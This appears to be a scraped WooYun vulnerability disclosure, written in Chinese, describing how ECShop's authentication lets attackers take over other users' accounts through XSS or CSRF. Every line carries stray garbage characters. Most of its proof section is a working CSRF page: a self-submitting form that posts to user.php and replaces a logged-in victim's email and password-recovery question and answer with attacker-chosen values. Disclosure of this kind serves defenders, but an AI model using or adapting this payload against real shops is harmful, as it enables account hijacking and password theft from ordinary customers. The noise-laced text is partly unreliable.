简要描述:* l2 S* E$ {$ x7 j' _4 s6 q4 p9 [
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
) G% Y3 C D4 R# p V
/ g# L6 d" o1 v& s1 H& s! SDemo For:http://www.wooyun.org/bug.php?action=view&id=3953 t8 S0 O9 \2 \2 J% {% W; j2 e
- u: ]3 v) a/ h4 p+ |9 N f% o
详细说明:
# O9 s& B3 t+ M5 l$ I利用csrf和xss可以突破官方所说的“障碍”
2 \! v3 a2 A, b9 A3 t0 k" b! Txss版本已经有人说明+ ]0 ?# J# O: B4 P0 r. O- P, l* m
这里给出csrf版本
' U8 z2 W$ E' X8 `* k* G
! N( K, v; q! m, ~+ ]+ G6 N7 I漏洞证明:. K" B, D. T W, o1 J
<html>
( ?" a7 ]# N1 f; G' f8 P/ E<body>
4 j7 m6 k# C* B- q7 g0 G9 b<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
. e9 T( G- X% `" ?6 O+ o<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
9 ] @0 j; u9 y2 ~<INPUT TYPE="text" NAME="act" value="act_edit_profile">
+ Y% i+ c0 M( C3 U( g" D<INPUT TYPE="text" NAME="sel_question" value="ecshop">4 @2 s* K( y3 W* j
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">+ s$ q4 }, i; N7 h6 O! l
</body>
6 |! q. d. h y0 S<script>& W' }% e* y5 e, s$ F
document.forms[0].submit();
3 U3 Q5 }9 \- P$ J/ ?. Q @</script>; A2 | D1 F) o! e5 w4 m
</html>
# t7 k5 o( U9 c P) S! S* D3 E, {构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
& U+ E" Z8 J! w, B y; ?5 w! p3 x _% c5 H3 ]
|